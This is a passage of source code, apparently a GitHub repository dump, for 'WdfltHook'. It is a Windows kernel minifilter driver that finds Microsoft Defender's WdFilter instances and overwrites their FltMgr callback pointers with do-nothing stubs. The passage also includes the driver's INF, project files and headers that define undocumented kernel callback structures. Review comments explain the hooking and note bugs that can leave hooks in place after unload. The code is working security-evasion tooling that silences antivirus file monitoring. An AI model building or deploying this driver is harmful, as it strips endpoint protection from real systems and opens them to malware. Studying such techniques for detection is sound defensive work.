    PFLT_INSTANCE* InstanceList = NULL;
    ULONG InstanceListSize = 0;
    ULONG NumberOfInstancesReturned = 0;
    NTSTATUS status = STATUS_SUCCESS;
    UNICODE_STRING filterName;
    RtlInitUnicodeString(&filterName, FilterName);
    PFLT_FILTER fltobj = NULL;
    if (NT_SUCCESS(FltGetFilterFromName(&filterName, &fltobj)))
    {
        DbgPrint("[WdFilter_Hook] Found Target Filter Object!\n");
        // first call with a zero-length buffer only to learn the instance count
        status = FltEnumerateInstances(NULL, fltobj, InstanceList, InstanceListSize, &NumberOfInstancesReturned);
        if (status == STATUS_BUFFER_TOO_SMALL || status == STATUS_BUFFER_OVERFLOW)
        {
            InstanceListSize = sizeof(PFLT_INSTANCE) * NumberOfInstancesReturned;
            InstanceList = ExAllocatePoolWithTag(PagedPool, InstanceListSize, DRIVER_TAG);
            if (InstanceList)
            {
                status = FltEnumerateInstances(NULL, fltobj, InstanceList, InstanceListSize, &NumberOfInstancesReturned);
                if (NT_SUCCESS(status))
                {
                    DbgPrint("[WdFilter_Hook] Enumerating Target Filter Object Instances!\n");
                    for (ULONG i = 0; i < NumberOfInstancesReturned; i++)
                    {
                        PFLT_INSTANCE CurrentInstance = InstanceList[i];
                        DbgPrint("[WdFilter_Hook] Instance at : %llx!\n", (PVOID)CurrentInstance);
                        PCALLBACK_NODE TargetCallbackNode = NULL;
                        // Copy Instance Memory
                        DbgPrint("[WdFilter_Hook] Reading Instance %d Memory!", i+1);
                        PFLT_INSTANCE CurrentInstanceVA = ExAllocatePoolWithTag(NonPagedPool, 0x230, DRIVER_TAG);
                        MM_COPY_ADDRESS addrToRead;
                        addrToRead.VirtualAddress = CurrentInstance;
                        status = MmCopyMemory((PVOID)CurrentInstanceVA, addrToRead, 0x230, MM_COPY_MEMORY_VIRTUAL, &NumBytesReadFromInst);
                        if (!NT_SUCCESS(status))
                        {
                            // a failed read of one instance stops the whole enumeration
                            DbgPrint("[WdFilter_Hook] Failed to read instance memory!\n", i + 1);
                            ExFreePoolWithTag(CurrentInstanceVA, DRIVER_TAG);
                            break;
                        }
                        else
                        {
                            // Scan for callback node
                            for (ULONG x = 0; x < 0x230; x++)
                            {
                                DWORD64 PotentialPointer = *(PDWORD64)((DWORD64)CurrentInstanceVA + x);
                                PCALLBACK_NODE PotentialNode = (PCALLBACK_NODE)PotentialPointer;
                                if (MmIsAddressValid((PVOID)PotentialPointer))
                                {
                                    if (IsCallbackNode(PotentialNode, CurrentInstance, TargetDriverStart, TargetDriverSize))
                                    {

                                        DbgPrint("[WdFilter_Hook] Found CallbackNode of %ws : Node %llx Pre: %llx Post: %llx !\n", FilterName,PotentialNode, PotentialNode->PreOperation, PotentialNode->PostOperation);
                                        // swap the live pointers in FltMgr's node; the original
                                        // values go to RestoreList for WdfltHookUnload
                                        if (MmIsAddressValid(PotentialNode->PreOperation))
                                        {
                                            SaveOrigCallback(&PotentialNode->PreOperation, PotentialNode->PreOperation);
                                            InterlockedExchange64(&PotentialNode->PreOperation, WdfltHookPreOperation);
                                        }
                                        if (MmIsAddressValid(PotentialNode->PostOperation))
                                        {
                                            SaveOrigCallback(&PotentialNode->PostOperation, PotentialNode->PostOperation);
                                            InterlockedExchange64(&PotentialNode->PostOperation, WdfltHookPostOperation);
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
                ExFreePoolWithTag(InstanceList, DRIVER_TAG);
            }
            else
            {
                return STATUS_INSUFFICIENT_RESOURCES;
            }
        }
        FltObjectDereference(fltobj);
    }
    else
    {
        status = STATUS_UNSUCCESSFUL;
    }

    return status;
}



// Driver entry: registers this driver as an (inert) minifilter, then
// immediately resolves the WdFilter.sys image range and hooks WdFilter's
// instances.
//
// The results of InitDriverGlobals and HookTargetFilter are ignored. The hook
// also runs when FltRegisterFilter / FltStartFiltering failed: `status` is only
// returned afterwards, never checked before the hook.
//
// NOTE(review): if FltStartFiltering fails the filter is unregistered, the
// hooks are still installed and the failing status is returned — presumably the
// image is then unloaded without WdfltHookUnload ever running to restore them.
NTSTATUS
DriverEntry (
    _In_ PDRIVER_OBJECT DriverObject,
    _In_ PUNICODE_STRING RegistryPath
    )

{
    NTSTATUS status;

    UNREFERENCED_PARAMETER( RegistryPath );

    PT_DBG_PRINT( PTDBG_TRACE_ROUTINES,
                  ("WdfltHook!DriverEntry: Entered\n") );


    status = FltRegisterFilter( DriverObject,
                                &FilterRegistration,
                                &gFilterHandle );

    FLT_ASSERT( NT_SUCCESS( status ) );

    if (NT_SUCCESS( status )) {

        status = FltStartFiltering( gFilterHandle );

        if (!NT_SUCCESS( status )) {

            FltUnregisterFilter( gFilterHandle );
        }
    }
    DbgPrint("[WdFilter_Hook] Loaded!\n");
    DbgPrint("[WdFilter_Hook] Initializing WdFilter driver address range\n");;
    InitDriverGlobals();
    HookTargetFilter(TARGET_FILTER_NAME);
    return status;
}

// Filter unload: restores the recorded callback pointers, frees the restore
// list (see the use-after-free note on CleanupRestoreList) and unregisters this
// driver's filter. This is the "we restore everything during unload" path the
// README refers to.
NTSTATUS
WdfltHookUnload (
    _In_ FLT_FILTER_UNLOAD_FLAGS Flags
    )

{
    UNREFERENCED_PARAMETER( Flags );

    PAGED_CODE();

    PT_DBG_PRINT( PTDBG_TRACE_ROUTINES,
                  ("WdfltHook!WdfltHookUnload: Entered\n") );
    UnhookCallbacks();
    CleanupRestoreList();

    FltUnregisterFilter( gFilterHandle );
    DbgPrint("[WdFilter_Hook] Driver unloaded !\n");
    return STATUS_SUCCESS;
}

// Pre Operation hook
//
// Replacement pre-operation callback written into WdFilter's callback nodes by
// HookTargetFilter. It never inspects the operation: every request returns
// FLT_PREOP_SUCCESS_WITH_CALLBACK, so WdFilter's original pre-callback is not run
// for that instance. Because it is entered through WdFilter's node, FltObjects
// presumably describes WdFilter's filter/instance rather than this driver's —
// verify. The operation-status branch is template code; `status` is assigned
// and never used.
FLT_PREOP_CALLBACK_STATUS
WdfltHookPreOperation (
    _Inout_ PFLT_CALLBACK_DATA Data,
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _Flt_CompletionContext_Outptr_ PVOID *CompletionContext
    )

{

    NTSTATUS status;

    UNREFERENCED_PARAMETER( FltObjects );
    UNREFERENCED_PARAMETER( CompletionContext );

    if (WdfltHookDoRequestOperationStatus( Data )) {

        status = FltRequestOperationStatusCallback( Data,
                                                    WdfltHookOperationStatusCallback,
                                                    (PVOID)(++OperationStatusCtx) );

    }

    // DbgPrint("[WdFilter_Hook] Hooked pre operation filter callback :: MajorFunction - 0x%x!\n",Data->Iopb->MajorFunction);

    return FLT_PREOP_SUCCESS_WITH_CALLBACK;
}



// Template operation-status callback: trace only (both prints are gated by
// gTraceFlags, which is 0).
VOID
WdfltHookOperationStatusCallback (
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_ PFLT_IO_PARAMETER_BLOCK ParameterSnapshot,
    _In_ NTSTATUS OperationStatus,
    _In_ PVOID RequesterContext
    )

{
    UNREFERENCED_PARAMETER( FltObjects );

    PT_DBG_PRINT( PTDBG_TRACE_ROUTINES,
                  ("WdfltHook!WdfltHookOperationStatusCallback: Entered\n") );

    PT_DBG_PRINT( PTDBG_TRACE_OPERATION_STATUS,
                  ("WdfltHook!WdfltHookOperationStatusCallback: Status=%08x ctx=%p IrpMj=%02x.%02x \"%s\"\n",
                   OperationStatus,
                   RequesterContext,
                   ParameterSnapshot->MajorFunction,
                   ParameterSnapshot->MinorFunction,
                   FltGetIrpName(ParameterSnapshot->MajorFunction)) );
}


// Replacement post-operation callback written into WdFilter's callback nodes.
// Ignores every parameter and returns FLT_POSTOP_FINISHED_PROCESSING, so
// WdFilter's original post-callback is not run for that instance.
FLT_POSTOP_CALLBACK_STATUS
WdfltHookPostOperation (
    _Inout_ PFLT_CALLBACK_DATA Data,
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_opt_ PVOID CompletionContext,
    _In_ FLT_POST_OPERATION_FLAGS Flags
    )

{

    UNREFERENCED_PARAMETER( Data );
    UNREFERENCED_PARAMETER( FltObjects );
    UNREFERENCED_PARAMETER( CompletionContext );
    UNREFERENCED_PARAMETER( Flags );


    // DbgPrint("[WdFilter_Hook] Hooked post operation filter callbackn :: MajorFunction - 0x%x!\n", Data->Iopb->MajorFunction);

    return FLT_POSTOP_FINISHED_PROCESSING;
}


// Template pre-operation routine without a post-callback. Not referenced
// anywhere in this file: it is neither in Callbacks[] nor written by
// HookTargetFilter.
FLT_PREOP_CALLBACK_STATUS
WdfltHookPreOperationNoPostOperation (
    _Inout_ PFLT_CALLBACK_DATA Data,
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _Flt_CompletionContext_Outptr_ PVOID *CompletionContext
    )

{
    UNREFERENCED_PARAMETER( Data );
    UNREFERENCED_PARAMETER( FltObjects );
    UNREFERENCED_PARAMETER( CompletionContext );

    PT_DBG_PRINT( PTDBG_TRACE_ROUTINES,
                  ("WdfltHook!WdfltHookPreOperationNoPostOperation: Entered\n") );


    return FLT_PREOP_SUCCESS_NO_CALLBACK;
}


// Template helper: TRUE when the operation is one of the oplock-request FSCTLs
// or a directory-change notification, i.e. the operations for which the sample
// asks FltMgr for a status callback.
BOOLEAN
WdfltHookDoRequestOperationStatus(
    _In_ PFLT_CALLBACK_DATA Data
    )

{
    PFLT_IO_PARAMETER_BLOCK iopb = Data->Iopb;



    return (BOOLEAN)



        (((iopb->MajorFunction == IRP_MJ_FILE_SYSTEM_CONTROL) &&
          ((iopb->Parameters.FileSystemControl.Common.FsControlCode == FSCTL_REQUEST_FILTER_OPLOCK) ||
           (iopb->Parameters.FileSystemControl.Common.FsControlCode == FSCTL_REQUEST_BATCH_OPLOCK) ||
           (iopb->Parameters.FileSystemControl.Common.FsControlCode == FSCTL_REQUEST_OPLOCK_LEVEL_1) ||
           (iopb->Parameters.FileSystemControl.Common.FsControlCode == FSCTL_REQUEST_OPLOCK_LEVEL_2)))

         ||

         ((iopb->MajorFunction == IRP_MJ_DIRECTORY_CONTROL) &&
          (iopb->MinorFunction == IRP_MN_NOTIFY_CHANGE_DIRECTORY))
        );
}
-------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.inf: -------------------------------------------------------------------------------- 1 | ;;; 2 | ;;; WdfltHook 3 | ;;; 4 | 5 | [Version] 6 | Signature = "$Windows NT$" 7 | ; TODO - Change the Class and ClassGuid to match the Load Order Group value, see https://msdn.microsoft.com/en-us/windows/hardware/gg462963 8 | ; Class = "ActivityMonitor" ;This is determined by the work this filter driver does 9 | ; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value 10 | Class = "ActivityMonitor" 11 | ClassGuid = 
{b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} 12 | Provider = "Template" 13 | DriverVer = 09/29/2023,23.51.50.349 14 | CatalogFile = WdfltHook.cat 15 | PnpLockDown=1 16 | 17 | [DestinationDirs] 18 | DefaultDestDir = 12 19 | MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers 20 | 21 | ;; 22 | ;; Default install sections 23 | ;; 24 | 25 | [DefaultInstall] 26 | OptionDesc = %ServiceDescription% 27 | CopyFiles = MiniFilter.DriverFiles 28 | 29 | [DefaultInstall.Services] 30 | AddService = %ServiceName%,,MiniFilter.Service 31 | 32 | ;; 33 | ;; Default uninstall sections 34 | ;; 35 | 36 | [DefaultUninstall] 37 | DelFiles = MiniFilter.DriverFiles 38 | 39 | [DefaultUninstall.Services] 40 | DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting 41 | 42 | ; 43 | ; Services Section 44 | ; 45 | 46 | [MiniFilter.Service] 47 | DisplayName = %ServiceName% 48 | Description = %ServiceDescription% 49 | ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\ 50 | Dependencies = "FltMgr" 51 | ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER 52 | StartType = 3 ;SERVICE_DEMAND_START 53 | ErrorControl = 1 ;SERVICE_ERROR_NORMAL 54 | ; TODO - Change the Load Order Group value 55 | ; LoadOrderGroup = "FSFilter Activity Monitor" 56 | LoadOrderGroup = "FSFilter Activity Monitor" 57 | AddReg = MiniFilter.AddRegistry 58 | 59 | ; 60 | ; Registry Modifications 61 | ; 62 | 63 | [MiniFilter.AddRegistry] 64 | HKR,,"DebugFlags",0x00010001 ,0x0 65 | HKR,,"SupportedFeatures",0x00010001,0x3 66 | HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance% 67 | HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,%Instance1.Altitude% 68 | HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags% 69 | 70 | ; 71 | ; Copy Files 72 | ; 73 | 74 | [MiniFilter.DriverFiles] 75 | %DriverName%.sys 76 | 77 | [SourceDisksFiles] 78 | WdfltHook.sys = 1,, 79 | 80 | [SourceDisksNames] 81 | 1 = %DiskId1%,,, 82 | 83 | ;; 84 | ;; String Section 85 | ;; 86 | 87 | [Strings] 88 | 
ServiceDescription = "WdfltHook Mini-Filter Driver" 89 | ServiceName = "WdfltHook" 90 | DriverName = "WdfltHook" 91 | DiskId1 = "WdfltHook Device Installation Disk" 92 | 93 | ;Instances specific information. 94 | DefaultInstance = "WdfltHook Instance" 95 | Instance1.Name = "WdfltHook Instance" 96 | ; TODO - Change the altitude value, see https://msdn.microsoft.com/en-us/windows/hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers 97 | Instance1.Altitude = "370030" 98 | Instance1.Flags = 0x0 ; Allow all attachments 99 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.rc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include 4 | 5 | #define VER_FILETYPE VFT_DRV 6 | #define VER_FILESUBTYPE VFT2_DRV_SYSTEM 7 | #define VER_FILEDESCRIPTION_STR "WdfltHook Filter Driver" 8 | #define VER_INTERNALNAME_STR "WdfltHook.sys" 9 | 10 | #include "common.ver" 11 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.33927.289 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WdfltHook", "WdfltHook\WdfltHook.vcxproj", "{0D6423DD-7D02-4436-8C83-7F2069F5F388}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|ARM64 = Debug|ARM64 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|ARM = Release|ARM 15 | Release|ARM64 = Release|ARM64 16 | Release|x64 = Release|x64 17 | Release|x86 = Release|x86 18 | EndGlobalSection 19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 20 | 
{0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.ActiveCfg = Debug|ARM 21 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.Build.0 = Debug|ARM 22 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.Deploy.0 = Debug|ARM 23 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.ActiveCfg = Debug|ARM64 24 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.Build.0 = Debug|ARM64 25 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.Deploy.0 = Debug|ARM64 26 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.ActiveCfg = Debug|x64 27 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.Build.0 = Debug|x64 28 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.Deploy.0 = Debug|x64 29 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.ActiveCfg = Debug|Win32 30 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.Build.0 = Debug|Win32 31 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.Deploy.0 = Debug|Win32 32 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.ActiveCfg = Release|ARM 33 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.Build.0 = Release|ARM 34 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.Deploy.0 = Release|ARM 35 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.ActiveCfg = Release|ARM64 36 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.Build.0 = Release|ARM64 37 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.Deploy.0 = Release|ARM64 38 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.ActiveCfg = Release|x64 39 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.Build.0 = Release|x64 40 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.Deploy.0 = Release|x64 41 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.ActiveCfg = Release|Win32 42 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.Build.0 = Release|Win32 43 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.Deploy.0 = Release|Win32 44 | EndGlobalSection 45 | GlobalSection(SolutionProperties) = preSolution 46 | HideSolutionNode = FALSE 47 | 
EndGlobalSection 48 | GlobalSection(ExtensibilityGlobals) = postSolution 49 | SolutionGuid = {55558C6C-46F7-434F-A023-93E4BC6B38AD} 50 | EndGlobalSection 51 | EndGlobal 52 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | Debug 22 | ARM 23 | 24 | 25 | Release 26 | ARM 27 | 28 | 29 | Debug 30 | ARM64 31 | 32 | 33 | Release 34 | ARM64 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | {0D6423DD-7D02-4436-8C83-7F2069F5F388} 44 | {f2f62967-0815-4fd7-9b86-6eedcac766eb} 45 | v4.5 46 | 12.0 47 | Debug 48 | Win32 49 | WdfltHook 50 | 51 | 52 | 53 | Windows10 54 | true 55 | WindowsKernelModeDriver10.0 56 | Driver 57 | WDM 58 | 59 | 60 | Windows10 61 | false 62 | WindowsKernelModeDriver10.0 63 | Driver 64 | WDM 65 | 66 | 67 | Windows10 68 | true 69 | WindowsKernelModeDriver10.0 70 | Driver 71 | WDM 72 | 73 | 74 | Windows10 75 | false 76 | WindowsKernelModeDriver10.0 77 | Driver 78 | WDM 79 | 80 | 81 | Windows10 82 | true 83 | WindowsKernelModeDriver10.0 84 | Driver 85 | WDM 86 | 87 | 88 | Windows10 89 | false 90 | WindowsKernelModeDriver10.0 91 | Driver 92 | WDM 93 | 94 | 95 | Windows10 96 | true 97 | WindowsKernelModeDriver10.0 98 | Driver 99 | WDM 100 | 101 | 102 | Windows10 103 | false 104 | WindowsKernelModeDriver10.0 105 | Driver 106 | WDM 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | DbgengKernelDebugger 118 | 119 | 120 | DbgengKernelDebugger 121 | 122 | 123 | DbgengKernelDebugger 124 | 125 | 126 | DbgengKernelDebugger 127 | true 128 | 129 | 130 | DbgengKernelDebugger 131 | 132 | 133 | DbgengKernelDebugger 134 | 135 | 136 | DbgengKernelDebugger 137 | 138 | 139 | DbgengKernelDebugger 140 | 141 | 142 | 143 | fltmgr.lib;%(AdditionalDependencies) 144 | 145 | 146 | 
147 | 148 | fltmgr.lib;%(AdditionalDependencies) 149 | 150 | 151 | 152 | 153 | fltmgr.lib;%(AdditionalDependencies) 154 | 155 | 156 | 157 | 158 | fltmgr.lib;%(AdditionalDependencies) 159 | /INTEGRITYCHECK %(AdditionalOptions) 160 | 161 | 162 | $(ProjectDir);%(AdditionalIncludeDirectories) 163 | false 164 | 165 | 166 | 167 | 168 | fltmgr.lib;%(AdditionalDependencies) 169 | 170 | 171 | 172 | 173 | fltmgr.lib;%(AdditionalDependencies) 174 | 175 | 176 | 177 | 178 | fltmgr.lib;%(AdditionalDependencies) 179 | 180 | 181 | 182 | 183 | fltmgr.lib;%(AdditionalDependencies) 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {8E41214B-6785-4CFE-B992-037D68949A14} 18 | inf;inv;inx;mof;mc; 19 | 20 | 21 | 22 | 23 | Driver Files 24 | 25 | 26 | 27 | 28 | Source Files 29 | 30 | 31 | 32 | 33 | Resource Files 34 | 35 | 36 | 37 | 38 | Header Files 39 | 40 | 41 | Header Files 42 | 43 | 44 | Header Files 45 | 46 | 47 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/fltmgtr.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | typedef struct _CALLBACK_NODE 6 | { 7 | LIST_ENTRY CallbackLinks; 8 | PFLT_INSTANCE Instance; 9 | PVOID PreOperation; 10 | PVOID PostOperation; 11 | LONG Flags; 12 | } CALLBACK_NODE, * PCALLBACK_NODE; 
-------------------------------------------------------------------------------- /WdfltHook/WdfltHook/ntdefs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 4 | 5 | typedef unsigned char BYTE, * PBYTE, * LPBYTE; 6 | 7 | 8 | 9 | typedef struct _PEB_LDR_DATA { 10 | BYTE Reserved1[8]; 11 | PVOID Reserved2[3]; 12 | LIST_ENTRY InMemoryOrderModuleList; 13 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 14 | 15 | typedef struct _RTL_DRIVE_LETTER_CURDIR 16 | { 17 | USHORT Flags; 18 | USHORT Length; 19 | ULONG TimeStamp; 20 | UNICODE_STRING DosPath; 21 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 22 | 23 | #define RTL_MAX_DRIVE_LETTERS 32 24 | 25 | typedef struct _CURDIR 26 | { 27 | UNICODE_STRING DosPath; 28 | HANDLE Handle; 29 | } CURDIR, * PCURDIR; 30 | 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #pragma once 40 | 41 | typedef enum _DCMB_CALLBACK_TYPE { 42 | LoadImageCallback, 43 | ProcessCreationCallback, 44 | ThreadCreationCallback, 45 | ProcessObjectCreationCallback, 46 | ThreadObjectCreationCallback, 47 | RegistryCallback, 48 | DriverVerificationCallback 49 | } DCMB_CALLBACK_TYPE; 50 | 51 | typedef enum _SYSTEM_INFORMATION_CLASS { 52 | SystemBasicInformation = 0, 53 | SystemPerformanceInformation = 2, 54 | SystemTimeOfDayInformation = 3, 55 | SystemProcessInformation = 5, 56 | SystemProcessorPerformanceInformation = 8, 57 | SystemInterruptInformation = 23, 58 | SystemExceptionInformation = 33, 59 | SystemRegistryQuotaInformation = 37, 60 | SystemLookasideInformation = 45, 61 | SystemCodeIntegrityInformation = 103, 62 | SystemPolicyInformation = 134, 63 | } SYSTEM_INFORMATION_CLASS; 64 | 65 | 66 | typedef struct _KLDR_DATA_TABLE_ENTRY 67 | { 68 | LIST_ENTRY InLoadOrderLinks; 69 | PVOID ExceptionTable; 70 | ULONG ExceptionTableSize; 71 | PVOID GpValue; 72 | 
PNON_PAGED_DEBUG_INFO NonPagedDebugInfo; 73 | PVOID DllBase; 74 | PVOID EntryPoint; 75 | ULONG SizeOfImage; 76 | UNICODE_STRING FullDllName; 77 | UNICODE_STRING BaseDllName; 78 | ULONG Flags; 79 | USHORT LoadCount; 80 | USHORT __Unused5; 81 | PVOID SectionPointer; 82 | ULONG CheckSum; 83 | PVOID LoadedImports; 84 | PVOID PatchInformation; 85 | } KLDR_DATA_TABLE_ENTRY, * PKLDR_DATA_TABLE_ENTRY; 86 | 87 | typedef struct _REGISTRY_CALLBACK_ITEM 88 | { 89 | LIST_ENTRY Item; 90 | DWORD64 Unknown1[2]; 91 | DWORD64 Context; 92 | DWORD64 Function; 93 | UNICODE_STRING Altitude; 94 | DWORD64 Unknown2[2]; 95 | } REGISTRY_CALLBACK_ITEM, * PREGISTRY_CALLBACK_ITEM; 96 | 97 | typedef struct OB_CALLBACK_ENTRY_t { 98 | LIST_ENTRY CallbackList; // linked element tied to _OBJECT_TYPE.CallbackList 99 | OB_OPERATION Operations; // bitfield : 1 for Creations, 2 for Duplications 100 | BOOL Enabled; // self-explanatory 101 | struct OB_CALLBACK_t* Entry; // points to the structure in which it is included 102 | POBJECT_TYPE ObjectType; // points to the object type affected by the callback 103 | POB_PRE_OPERATION_CALLBACK PreOperation; // callback function called before each handle operation 104 | POB_POST_OPERATION_CALLBACK PostOperation; // callback function called after each handle operation 105 | KSPIN_LOCK Lock; // lock object used for synchronization 106 | } OB_CALLBACK_ENTRY, * POB_CALLBACK_ENTRY; 107 | 108 | typedef struct _CALLBACK_OBJECT 109 | { 110 | ULONG Signature; 111 | KSPIN_LOCK Lock; 112 | LIST_ENTRY RegisteredCallbacks; 113 | BOOLEAN AllowMultipleCallbacks; 114 | UCHAR reserved[3]; 115 | } CALLBACK_OBJECT; 116 | 117 | typedef struct _CALLBACK_REGISTRATION 118 | { 119 | LIST_ENTRY Link; 120 | PCALLBACK_OBJECT CallbackObject; 121 | PCALLBACK_FUNCTION CallbackFunction; 122 | PVOID CallbackContext; 123 | ULONG Busy; 124 | BOOLEAN UnregisterWaiting; 125 | } CALLBACK_REGISTRATION, * PCALLBACK_REGISTRATION; 126 | 127 | 128 | 129 | typedef NTSTATUS(NTAPI* 
PROTOTYPE_ZWQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS info, PVOID infoinout, ULONG len, PULONG retLen); 130 | 131 | typedef struct _RTL_PROCESS_MODULE_INFORMATION 132 | { 133 | ULONG Section; 134 | PVOID MappedBase; 135 | PVOID ImageBase; 136 | ULONG ImageSize; 137 | ULONG Flags; 138 | USHORT LoadOrderIndex; 139 | USHORT InitOrderIndex; 140 | USHORT LoadCount; 141 | USHORT OffsetToFileName; 142 | CHAR FullPathName[256]; 143 | } RTL_PROCESS_MODULE_INFORMATION, * PRTL_PROCESS_MODULE_INFORMATION; 144 | 145 | typedef struct _RTL_PROCESS_MODULES 146 | { 147 | ULONG NumberOfModules; 148 | RTL_PROCESS_MODULE_INFORMATION Modules[1]; 149 | } RTL_PROCESS_MODULES, * PRTL_PROCESS_MODULES; 150 | 151 | typedef struct _RTL_USER_PROCESS_PARAMETERS 152 | { 153 | ULONG MaximumLength; //6c0 154 | ULONG Length;//6c0 155 | ULONG Flags;//0 156 | ULONG DebugFlags;//0 157 | HANDLE ConsoleHandle;//NULL 158 | ULONG ConsoleFlags;//0 159 | HANDLE StandardInput;//NULL 160 | HANDLE StandardOutput;//NULL 161 | HANDLE StandardError;//NULL 162 | CURDIR CurrentDirectory; 163 | UNICODE_STRING DllPath; 164 | UNICODE_STRING ImagePathName; 165 | UNICODE_STRING CommandLine; 166 | PWSTR Environment; 167 | ULONG StartingX; 168 | ULONG StartingY; 169 | ULONG CountX; 170 | ULONG CountY; 171 | ULONG CountCharsX; 172 | ULONG CountCharsY; 173 | ULONG FillAttribute; 174 | ULONG WindowFlags; 175 | ULONG ShowWindowFlags; 176 | UNICODE_STRING WindowTitle; 177 | UNICODE_STRING DesktopInfo; 178 | UNICODE_STRING ShellInfo; 179 | UNICODE_STRING RuntimeData; 180 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 181 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 182 | SIZE_T EnvironmentSize; 183 | #endif 184 | #if (NTDDI_VERSION >= NTDDI_WIN7) 185 | SIZE_T EnvironmentVersion; 186 | #endif 187 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 188 | 189 | 190 | typedef struct _PEB { 191 | BYTE Reserved1[2]; 192 | BYTE BeingDebugged; 193 | BYTE Reserved2[1]; 194 | PVOID Reserved3[2]; 195 | 
